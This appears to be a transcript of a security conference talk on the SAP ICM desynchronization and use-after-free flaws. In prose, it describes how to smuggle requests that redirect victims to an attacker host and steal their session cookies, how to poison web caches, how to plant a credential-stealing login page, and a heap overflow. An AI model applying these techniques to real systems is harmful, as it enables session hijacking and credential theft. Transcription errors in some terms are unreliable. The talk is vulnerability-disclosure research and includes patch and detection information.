 So yeah, this is internal server error, exploiting inter-process communication with new desynchronization primitives. Please welcome Martin Donahard. Hello everyone, welcome to internal server error, exploiting inter-process communication with new desynchronization primitives. My name is Martín Dojenal, I'm a security researcher at Onapsis, which is a company focused on enterprise software security. And among the different enterprise software developers, SAP is probably the most popular one with over 400,000 customers, and this includes 90% of 4,500 companies. Most of the services that SAP provides are for managing business processes, such as financials, operations, human capital, customer relationship, supply chain, and many other software that manage the critical assets of a company. And to do so, they provide a lot of modules that are based on web services that are accessible through HTTP, and this is true for both Java and ABAP, and also for S4HANA and the cloud. And to expose these kind of services, they use the same proprietary HTTP server in all their products, which is called the Internet Communication Manager. And so what is this Internet Communication Manager, or ICM? Well, it's a component that is used to handle all the communication with the outside world, and with the SAP system, and this includes all communication with clients, such as different employees or customers, also with other systems and with other SAP systems. Among the different protocols that can be used, there is P4, which is a proprietary protocol similar to RMA. Also IOP, SMTP, but the main purpose of this Internet Communication Manager is to handle the HTTP and HTTPS communications. And this is really important. This is the component that will be exposed and will be present by default in all SAP installations in the world. Therefore, we will find it in all SAP products, and it is quite important, and that's why I decided to make a research on this, because anytime we find an SAP, the HTTP service will be exposed and we will find many SAP systems exposing this to the Internet. But before I can find any vulnerability, I needed to understand how this Internet Communication Manager worked, and of course we don't have the source code that is not before because SAP does not like open source. They know that would kill the fans, so I had to reverse-engine the entire components. And you can see that SAP provide us with a small diagram, which says not too much about the architecture. We can see some components, but it's not really distributed, so I had to make a small extraction of this diagram so that you understand how this worked. Also, I will abstract a lot of internals. If you want to learn more or want to know more about this, you can ask me later or you can write me through my Twitter or see the white paper. So first, we will say that the ICM is the HTTP server that will receive connections from clients, and when a client starts a TCP connection, a worker thread, which is an internal thread from the process will be assigned to this TCP connection. And the idea is that this worker thread handles all the requests and responses for this specific client, so when a client sends a request, it will be received by the worker thread, which will use the HTTP parser to understand the request, then it will use some internal HTTP handlers, which I will talk later about them, and to try to resolve this request internally, and if it's not possible to do it, which will be the most cases that will be the case, it will send the request to another process, and this is because the business logic of the NSAP is not inside the ICM, it's actually programmed in Java or ABAP, therefore it will be sent to another process, and to do so, it will use something that is called memory pipes, which I will also explain in a minute, to efficiently send this data to the other process, which is called the worker process, which will generate a response, send it back through these memory pipes to the ICM, and the ICM will forward it to the client. So again, what are these memory pipes? Well, MPI is how SAP call it, it's a framework that supports exchange of data between the SAP and the worker process, which can be Java or ABAP. So the idea is this framework will be used to send the data, but not to copy all the requests and responses, because that would be any efficient. So the MPI uses the shared memory to do so. So it will use MPI buffers, which are just fixed size buffers of 65 kilobytes, and they will be stored in the shared memory, and instead of sending the entire request and response and copying from one process to another, it will just send a pointer, which is called an MPI pointer to these MPI buffers. It will use the MPI handler, which is a class that will manage all these communications. So let's see an example. First, when a request arrives to the ICM, actually to the worker thread, the input output handler will receive this. This is just a TCP socket that will have an internal buffer to store everything that comes from the internet. And when the ICM worker thread is ready to receive and handle a request, it will first reserve an MPI buffer, then it will store the request there. This is all going to be done using the MPI handler. And now, when it will use the HTTP parser, then it will try to resolve the request using internal handlers, and if it fails, it will send the request to the worker process. This is going to be done by sending just the MPI pointer. And now the Java or ABA process will have a reference to this request. Then it will generate a response, and it will also reserve a new MPI buffer, which will store the response. Then it will send the MPI pointer back to the worker thread, and the worker thread will forward this response back to the client. Then both MPI buffers will be freed one by one, and then the references will be lost. So I also said that there are some internal handlers that are going to be used to try to resolve the request, and they are inside the ACM, they are actually functions that will try to generate a response out of a request, and they will be included, when a request arrives, sorry, they will be, there will be a list of handlers that will be used, and the component that will decide which handlers should be included is the HTTP parser, so it will see at the URL, and depending on the URL, it will know which handlers should be included in the list, and then those handlers will try to resolve the request. So when an internal handler is able to resolve a request, actually when any handler is able to resolve a request, the other handlers will be deleted from this list, and the response will be sent back to the client. So first, we have the cache handler. I'm going to show the handlers in order as they are being called when they are included in the list. So first, we have the cache handler. This is present by default, and it's always included in the list, no matter what the URL is, it's always included in the handler's list. And the cache handler will do what we all expect. It will try to resolve the request by looking at the cache, and if it has an stored object for that URL, then it will return the response back to the client. Then we have the admin handler and the authentication handler. They are both going to be called, they are both present by default, sorry, but they are only going to be called depending on the URL, and if the pattern is correct. So for the admin handler, there is a prefix being slash SAP slash admin, and for the authentication handler, we will have some hardcoded values in the ICM that will be used to know if the handler should be included or not. Then we have the modification handler, the file access handler, and the re-reg handler. They are not present by default. They need to be set in a configuration file before the SAP starts, so we are not going to see more about them. And finally, we'll have the Java and the ABAP handler that depends on how the system is configured, and they also are going to be always included by default, but they are not going to try to resolve the request internally, they will just send the request to the worker process. As you can see, there is a specific function for each of these handlers. We also have other handlers like the log handler, but that's not really interesting for us because it cannot generate a response out of a request. So let's see an example of how a request is resolved using internal handlers. Again, when a request arrive, it will be stored in the input of the handler, and in this case, we see that the request is to get to slash SAP slash admin. Again, the worker thread will try to, will reserve a new MPI buffer, it will place their request there, and now the HTTP parser will start calling different handler, will actually include these handlers in the list. First, the cache handler is always, because it's always included. Then in this case, the admin handler because of the slash SAP slash admin prefix, and then the Java or APEP handler, depending on the worker process that is going to be used. Now, the cache handler is going to be called. In this case, let's say it fails, it cannot resolve the request. So in this case, the admin handler is also going to be called after this, and in this case, we see that we can, we obtain a response out of the cache handler. So this is not going to be placed in the shared memory because it's not necessary, we will not send it to the worker process. The response is going to be placed in the heap, and then this will be forwarded, all the other handlers will be deleted, and this will be hand forwarded to the client. Again, the MPI buffer will be freed, and the reference will be lost. So as I said, MPI buffers are fixed size. This means that they can only hold 65 kilobytes of data. So what if we send a longer request, okay? And I'm going to call this a long request even though it's not that long, it's just 65 kilobytes, but what if we send something that cannot be feed inside the MPI buffer? So let's see an example. We send a request with a content length of 66,000 bytes. And the ICM will first reserve an MPI buffer as always, and it will only place this first 65 kilobytes of the request that has arrived from the client. And this is because the internal handlers are supposed to resolve requests that does not contain body, that are just simple requests with some special heaters. And so the ICM is not expecting to use the rest of the body or the rest of the request until the worker process is required. So again, the HTTP parser will read the request, will call some handlers. In this case, the cache handler is not able to resolve the request. And so when the Java Reba process is called, so when we send this request to the worker process, then in this case, we will need the rest of the request because of course, the Java Reba process will use the body of a request and the business logic needs this kind of data. So the ICM will reserve as many MPI buffers as required. It will store the rest of the request there and it will send all the MPI pointers to the worker process. Now the worker process will have a reference and it will use them to generate a response. And again, the worker process will reserve an MPI buffer, store the response, send it to the worker thread. And the worker thread will forward this response back to the client. And now, as I said previously, these MPI buffers are going to be freed one by one when we have a simple request. However, when we have a multi-buffer request, the MPI free all buffer function is going to be called which will delete or will free all the MPI buffers that are associated with this worker thread. And then the references will be lost. So let's see at the first vulnerability. As I said, the worker thread is not expecting to use or to resolve a request we're using the body because internal handlers shouldn't use that kind of information. But what if we send a long request that is not handled by the worker process but instead is handled by an internal handler? So again, as I already explained, we will see in this case we have a get request to slash SAP slash admin. And it's a long request containing 66,000 bytes. Therefore, only the first 65 kilobytes will be stored in an MPI buffer. And then the parser will include these different handlers. The cache handler again will fail. But in this case, the admin handler was able to generate a response. So this response will again be sent to the client. Then all the handlers will be removed. The MPI buffer will be freed. And the request response cycle will be completed. But as you can see, we have more data from the previous request in the input output handler. So now, when the worker thread tries to read a new request, it will consider this as, of course, a new isolated request. So if you know something about the HTTPS synchronization, which I hope you do if you came to this talk, you know that this is a vulnerability and a serious one. And this is because whenever we send this kind of request that you can see in the slides, which contains a get request to SAP, slash SAP, slash admin, it will be resolved by internal handler as we saw. And actually the proxy will forward this as an entire request without seeing any problem. And this is because we don't have nothing that tells the proxy that this is a special request. Actually, it is HTPRFC compliance. Compliance, so there is no problem. There's just a get request with a big content length, but the entire body is included in that content length. But when this request arrives to the ICM, it will be split it, and the last part, which is the get to smuggle, will be used as an isolated request. Therefore, it will be a synchronization between the proxy, any proxy in the world, because, again, any proxy will see this as an isolated request, and the ICM. And this is a serious vulnerability. It's actually a CBSS10, because it allows us to compromise any SAP installation in the world in the most exposed service, and I'm going to show you some examples of how to exploit this to actually take control of the big teams and the HTTP and the actual applications. So first, my first example is going to be using HTTP request modeling, and I'm going to use the NWA endpoint, which is present, again, in all SAPs, and it's used to redirect any user to the login URL. And it provides two really interesting features. First, an open redirect, which will allow us to set anything we want in the relocation host by using the host header. As you can see, I can place the attacker host in the host header, and this will be reflected in the location header of the response. This is actually a feature. This is not a vulnerability by itself, because it cannot be exploited by itself. And also, we have a parameter reflection, which will allow us to reflect anything we place in the body of the request, in the query string of the relocation URL. Again, you can see that the line breaks are replaced with spaces. So, how can we combine this with the desynchronization vulnerability to take control of big teams' request and also to take control of big teams' session cookies? Well, first, the attacker will send a payload, which will smuggle an entire request. And as you can see, the first part, it will be forwarded entirely by the proxy, as when I select the request, it will be split it in the ICM. And the first part will be resolved by the internal handler, and the response will be sent back to the attacker. But the rest of the request, which is the smuggled one, will stay in the ICM. And this is because the content length states that there should be 100 bytes of body, but we didn't send anything in the body. So it will wait for more data. Also, you can see this is a post request to NWA, and the host header is eval.com. So that's a host controlled by the attacker. Now, when a victim sends a request to the proxy, the proxy will just forward this. And in the ICM, this will be concatenated to the smuggled message that we injected. And so the first 100 bytes of the victim's request will be used as part of the body of this request. And if you remember, the NW endpoint will allow us to generate a response in this case that will redirect the victim to eval.com, and it will send also in the query string of the request the first 100 bytes of its original request, which in this case also contains the cookies. So when this is received by the victim's browser, the browser will send another request, but in this case to eval.com, which is controlled by the attacker. And so the attacker will receive this request, which will contain also the cookies from the victim. Now, we will be able to hijack as many requests as as many cookies and sessions as we want, but for each of these requests that we hijacked, we will need to send a new request, okay? So something that is really special about this vulnerability is that we are not using any kind of request that is invalid, so any proxy will see this and it will say, okay, this is completely RFC compliance. We are not sending any header, anything strange. And so this means that we will be able to replicate the attack and to send it using a form, an HTML form, and also JavaScript. So the idea is, as you can see in the slide, I created a form that will send a request to an SAP system that will be resolved by an internal handler, in this case, the admin handler. And it will also contain a padding to make this request a long request. And finally, at the end, it will place the smuggle request. So when a victim receives this form, the JavaScript will submit this form again, and so the attack will be sent by, in this case, not from the attacker, but from the victim. So now the victim became the attacker, and this will continue as long as we actually will continue forever because the victims will, when making a request to the SAP, will receive again the payload, will be redirected to edible.com, and then again send the attack. Okay, so again we can place this in the edible.com. That's the idea. Also we can use the same kind of attacks when we find a vulnerability that does not require any invalid or forbidden hitter, like the one found last year in HIProxy. So we can use, in those cases, DNS rebinding to be able to send those extra hitters, but we can use this technique in many other ways. And if you saw yesterday's talk from James Kettle, you might think this is a really similar technique because we're actually using the same technique or the same idea. And even though the vulnerabilities, the nature of the vulnerabilities are different, we found that it is possible to cause this client-side desynchronization, so we are not only going to be able to persist the attack and create smuggling botnets, but also exploit the browser server connection. So we will be able to desynchronize even systems that are not using a proxy. This is a really new idea, and yesterday James provided a new methodology. It was a really great talk. I recommend that. And so, as I said, we can exploit this even without a proxy, and we could use social engineering if we are not able to reach the server to send this attack via with phishing, so we can send this form, and even without sending the first request, we will be able to attack and desynchronize the entire system and obtain the session cookies. So let's see a small demo. Okay, so in this demo, the first step is going to be the client. And as you can see, when the client sends a request to start page, he will just receive the 200 response. Nothing strange here. As many times as he wants, he will receive the same response, and he's including the cookies in this request. Now, when the attacker sends the payload, which is going to be resolved by an internal handler, and it's a long request, we will be able to smuggle another message and inject what is at the end, which is the post request that we already saw, the post to NWA. This will be stored in the ICM until more data arrives. So again, when we send this, we just receive a response. We don't care about that response. And when the victim sends a new request, instead of receiving a 200, he will receive a redirection to the evildot.com server. And now, again, he will be sending it when he follows this redirection, he will be sending his own cookies, and therefore we will be able to obtain these cookies, and of course, the secret session of the victim. And what we are going to see now is that when he follows the redirection, the evildot.com server, in this case, is another server, I don't remember the name, is going to return this form that I already explained. So the browser will send another attack, and this will keep the attack and exploit running. Okay, this is another exploit I'm going to explain. This technique is kind of advanced, so I explained these ideas last year in DEF CON. This is called response-muggling, and what we're going to try is to poison a webcast-shaped proxy. So anytime we have a webcast-shaped proxy in the middle of us, and we have a desynchronization vulnerability, we are going to be able to use this technique. I'm going to try to explain really fast. If you don't really understand this, you can see my last year talk, and I guess that will make this clear. So the attacker in this case is going to send two GET requests. Actually, the proxy will see two GET requests, but when they are forwarded to the backend, which in this case would be the ICM, they will be, the first one will be split into three different requests. And in this case, they will not be in complete request as we already saw, like with a content length, being a big content length without a body, but instead we are going to smuggle three complete requests. Now, as you can see the proxy saw that there were two GET requests, but in this case the ICM saw that the first request is a GET, the second one is a HEAT, the third one I don't care, and the third one is a GET. So you all know that the HEAT request is special because when you send this kind of request to a server, what we are going to receive is the same response that we would get for a GET request, but instead in this case, we are only going to receive the HEATers. What you might not know is that the RFC allow the servers to send also a content length, and this is almost always true. You will see this in this behavior in almost any server. And the content length, even though one would expect to be zero because the body is empty, it's not, it's the same one as the content length which would be if we would have issued a GET request. Therefore, in this case, we will see that it's quite longer than zero, it's like 3000 something. So how are the proxies going to know that they should ignore this content length header? Well because they know that they had forwarded a HEAT request and therefore when they receive the response for this HEAT request, they know that this content length shouldn't be used to generate the response and to know the length of the body of the response. But if you see in the slides, you can also see that this proxy didn't solve the HEAT request. Therefore, HEAT doesn't know that the content length should be ignored. So the first response will be sent to the attacker as always is the response for the first GET request. But now the second response is going to be used for a GET request. And in this case, the content length will be used because the proxy doesn't know this is a HEAT response. And so it will use part of the next response as the body. So it will use the HEATers of the next response as part of this body and also the rest. And we can build a lot of payloads out of this. We can use this to actually generate malicious responses that contain JavaScript. We can change the content type of different responses. So if we have a response where we can reflect data like text plane and we cannot use it to generate an exploit, well this can be used to change the content type. Also if we are able to reflect some data or something in the HEATers of the response, we can also use this as part of an HTML body. And also you will see that this response only also contain a cache control header. So if we choose a HEAT request that the response give us a cache control header, then we are going to be able to poison the cache with this malicious response. And the request and the URL that's going to be pointing is also chosen by the attacker. And we can choose any kind of URL we want. So we can arbitrarily to modify any record in the web cache. And we can store this payload there. So that then when the client request generates a record for the same URL, the proxy will not forward this, but instead it will send what is stored in the cache. Now we are also going to see a demo. Well, I don't know where the demos are. Can I have some help here? Yeah, it should be there. Sorry for that. Now in this demo, we are going to see how we can poison and modify the web cache of any proxy. I created an exploit that is going to poison any URL we want with a specific payload. In this case, it's going to generate a JavaScript that will generate an alert. So the idea again, I use this payload to modify any URL we want and generate this and inject the malicious response for that specific endpoint. And I can use this attack for something even better, which is to modify the login page of the SAP. So the idea is if we can modify anything we want, then why not modifying the URL that is used for login so that when a user loads this or use this HTML, it will actually send the credentials back to the attacker instead of the SAP. And then we can redirect the victim to another login with extra query stream parameters so that it doesn't use the cache version. So now again, as I said, I'm going to replace the login URL. This is always going to be used by any SAP user to login to the application. So it starts a server that is going to be listening to what this login sends. So again, this looks like the original login, nothing strange, the URL is still the same, nothing that the user can detect. And when he sends the credentials, instead of being sent to the SAP, they will be sent to the attacker. Well, again, it's our petition just to show that this will work anytime we want and this will be stored in the cache. So this will work without sending any other payload, this will keep working. Okay, so then I said, well, if I found a vulnerability like this, then I want to learn more about the ICM and I want to learn how the more complex requests are processed. And then I found that the ICM can be configured both for Java, Raibab, I knew that, but that there is a difference. When we configure the ICM for Java, we are going to see that the HTTP server accepts pipeline request by default. But when we configure it with a ABAP, this needs to be configured. So we are going to see the Java, this will work for ABAP if it's configured for pipeline. So pipelining means that we are going to be able to receive a request that contains two, actually a payload that contains two requests and the ICM will be able to split them. Now these are completely valid and legit requests that can be split using the content length and there is nothing strange from these requests. Now the process will be the same, the ICM worker thread will reserve a new MPI buffer, it will store the request there, it will then the HTTP parser will be called and the HTTP parser will recognize that there is an extra request. So it will reserve a new MPI buffer and it will place the rest of the request there. Now the ICM worker thread will continue processing the first one, it will send the request to the Java process, the Java process will generate the response, it will place it in the shared memory, send the reference to the worker thread and the worker thread will forward the response. Then both MPI buffers will be freed and the request response cycle will be completed so the ICM worker thread will be able to continue processing the next pipeline request. So remember I said that there is a string condition when we send multi-buffer requests, so long requests, and that is that the buffers are going to be freed all the buffers are going to be freed using the same function. So what if we send a pipeline request with a long request, pre-for. So again in this example we are sending a long request and at the end a new request, so when the worker thread receives this, it will place the first one in the MPI buffer, it will call the ACP parser, it will call the handlers and then when the worker thread is ready to send the request to the worker process which is the Java process, it will place the rest of the request in a new MPI buffer. But now the ACP parser will also recognize that there is an extra request and it will reserve a new MPI buffer and place the extra request there. Now everything will continue as we expect, this will be sent to the Java process, the Java process will generate the response, send it to the ICM, the ICM will forward the response, but now remember we have a long request, so therefore we are going to use the MPI free old buffers to free all these buffers and this is going to free all the buffers associated with the worker thread, including the pipeline one. So now the three first references will be lost but not the one with the pipeline request because free old buffers does not remove references. So this means we will be able to use a request that is inside a free MPI buffer and this will cause some problems. Of course if the worker thread tries to send this to a Java process, this will generate an error because the MPI handler knows that this worker thread does not have any reserve buffer, so this will generate an error and we will not receive a response. But what would happen if a client, another client from another TCP connection sends a request while we have the reference to this free MPI buffer? So the worker thread will actually reserve the same MPI buffer and we will have a reference to another's connection buffer. This can be a real problem and I'm going to show you why but first let me say that this is going to happen a lot of times because the MPI handler will store the free buffers in a stack even though SAP states that this is a queue when I reverse ensuring the component I understood that this is a stack therefore the last free buffer is going to be used in the next iteration. So this means that the worker thread too will write on top of our request and you might think okay we can use this to obtain a response that is intended for another client, this is not true we still have the problem of the MPI handler knowing that we don't have a reserve buffer. So what we are going to try to do is to write on top of a victim's request and to do so we are going to send a pipeline request that is not completed and this can be done by sending a request which does not contain two lane breaks after the hitters or that contains a body that is shorter than the message lane hitter states. So when this happens the worker thread will be set to read mode, it will wait for more data and once this data arrives to the ICM it will be written in the same buffer at the end of the last position that the worker thread wrote in a byte. So you can see that if we send two the request in two parts all the data will be written in the same buffer and that the offset will be updated. So the idea in this case will be we are going to try to tamper the victim's request and make him obtain a different response that the one he expected. Again we are going to send a long request with a pipeline request that is going to hijack a new, that is going to create a new buffer. You can see the MPI buffer at the top. The first request is going to be resolved, okay. It will send a response back to the client and now the MPI free of buffers will be called all the buffers will be freed and so then we have an extra buffer an extra reference to this buffer but this is a free buffer therefore other worker threads could use it and when the parser tries to read the request we sent which is just an extra byte, an X it will see that this is an incomplete request and therefore it will be set into the read mode and wait for more data and if we are lacking enough another worker thread will reserve this buffer and will place the request of a victim. Now at this point we will try to send more data so that this data is written in the same place or in this hijacking buffer and then we are going to write in the second position because the worker thread one thought that the only byte that was in this buffer is an X therefore it will start writing in the second position and we will be able to tamper all the requests from the victim, actually not the first byte but the rest of the request. So then when the worker thread two forward or send the MPI pointer to the Java process the Java process will use this request and will generate the malicious response then it will place it in the MPI buffer forward it to the worker thread two and the worker thread two will send this to the victim. So the steps to reproduce this attack again is the attacker needs to hijack a buffer this is easy and it's deterministic the victim will send a request and the request will be placed in the same MPI buffer this is not that is, I mean this is not deterministic but it happens a lot. The attacker then will tamper the victim's data or the victim's request and the victim will receive the malicious response. As you can see in the example when a victim sometimes when a victim sends a request to a star page he will receive instead of the 200 response a redirection to evil.com. And this attack does not require a proxy just as I already explained because we are tampering another TCP connection so we can launch this attack with or without a proxy. But maybe you are also wondering why some of these responses does not contain status code and that is because the buffers are multi-purpose this means that we can use the same buffer for request and responses. So in those cases we are not tampering a request but instead we are tampering a response. So the idea, and this is going to be the best idea for it to use this vulnerability is to instead of tampering a request we are going to try to tamper a response and I'm going to show you why. Again we have a buffer, a free buffer and we have a reference to it so we can write more data and we are going to wait for another client to send a request. Now in some cases the worker thread will not use the same buffer that we already that we have a reference to but instead a new one and that is because of timing if the worker thread has sent the client of the worker thread to send a request when we do not have a reference to a free buffer but instead to a reserve buffer then the worker thread two will use a new one. So in this case the worker thread two will just place the request in this new MPI buffer this will be sent to the Java process. The Java process will generate a response for this and this response in this case will be stored in the same MPI buffer that we have our reference to. So now we are able to write in the same buffer that the worker process placed the response. So if at that point we are able to send more data this data will tamper the response and therefore we will be able to write whatever we want in the response. So we are going to be able to generate any response we want and to exploit this by injecting any script any headers anything we want. Now when this response is received by the worker thread two the response parser will be called and it will forward the response to the client. But then the cache handle response cache handler will be called also. And if you see the MPI buffer that is in the slide you might notice that there is an extra header that you might not know which is called SAP cache control header. This is an internal cache this is an internal header that is going to be used and it's going to be used by the cache handler to know if the response should be stored or not. So what we are going to do is to place this so that the response for this is stored in the internal cache. And now we can modify any resource we want with an arbitrary response. If we play the role of the worker thread two instead of waiting for a victim to send this request we can choose which of the URLs are going to be modified. And so we can modify any URL with anything we want. In this demo I'm going to do the exact thing that I just explained. In this case we are not using a proxy we are just attacking the ICM. We can do it with a proxy we can encapsulate the same attack using the previous one I explained. And so this exploit is going to try to hijack a buffer send a lot of requests that will generate a response and a lot of requests in this case to star page because we are trying to poison the star page in the internal ICM cache. And so this will require a few attempts of course this is not deterministic but it is quite reliable. As you can see we are going to try to do it a few times. This script will adjust the times and it will also verify if the response has been modified in the cache just by requesting the star page and seeing the response. And after a few attempts we've got a successful attack. And what's important about this is if we have one successful attack then this will be persisted. So with one attack we will see that all the clients that request the star page will receive this response which is an arbitrary response with an arbitrary HTML. Okay finally I'm going to try to explain this really fast. We can also use this attack to cause both a buffer overflow in the heap and eventually obtain remote execution. This can be done so remember I said we are going to tamper a response but in this example we have not tampered a response already. The worker thread to generate a request which generate the response that contains SAP cache control header already. Okay this is a valid response. When the worker thread to receive this response it will use the response parser. It will send the response back to the victim or to the client and then the cache handler will be called. The cache handler will store this and actually the response is going to be stored in a file in the file system. And first the cache handler will set some headers in this file which contains the length of the entire response. And if we are able to tamper the response at this exact point then we are going to be able to force the cache handler into placing the malicious response in this file which does not contain the same length that the header states. So when another client request this Poisson resource the request cache handler will look in the cache it will find a response and it will use the headers of the cache file to create a buffer in the heap. And then it will write all the data in that heap in that buffer. But as the data is longer than these 85 bytes then we are going to be able to write over and write other data structures in the heap. We have demonstrated, I know and we have demonstrated that it's possible to obtain remote execution but the only problem is we need to defeat the randomization. Okay, so SAP released two parts for all their systems. They must be applied in any system using SAP because it's part of the SAP kernel. And the two CVs, which is the first one is a CVS10 for the first vulnerability. The second one they use after free is 8.1. In this case they said that the complexity of the attack is high and the scope is unchanged. We disagree, but that's how they saw it. And also it's important to see that it can be used in any SAP in the world. Also there are some workarounds that can be implemented in NetWeaver and WebDispatcher and we provided a tool that can be used to detect the attack. So finally some conclusions. We saw that HTTP servers are really interesting targets and this is because we can use reverse engineering by using the RFC in our mind. Okay, we know that this HTTP server must follow the RFC so it's easier to understand what the HTTP server is doing. Also they have similar functionalities and we can use the request and responses and locate them in memory to know what we can modify and what not. And we also saw many talks that are using different attacks like the one presented yesterday by Orange which is used, which is in IIS. But again, we see that these attacks in HTTP servers are increasing so it's really important to understand them and to keep looking for new new varieties. Also it was interesting to demonstrate that we can escalate low-level vulnerabilities with HTTP exploitation and this includes these new techniques called client-side desynchronization and also we can use DNS rebinding to bypass some VPNs and to leverage other attacks that in the past were not possible to be exploited. And finally, I want to say that ICMAT is the code name of the vulnerabilities was added by the cybersecurity infrastructure security agency of the US. They, all these vulnerabilities had a critical impact because the components that were exposed that were vulnerable were exposed to the internet and were present in all SAP installations. SAP stated that these were one of the worst vulnerabilities that they ever found or that they ever fixed. And so, and this is also because we are finding a vulnerability in a really exposed service which is HTTP and HTTPS. Questions.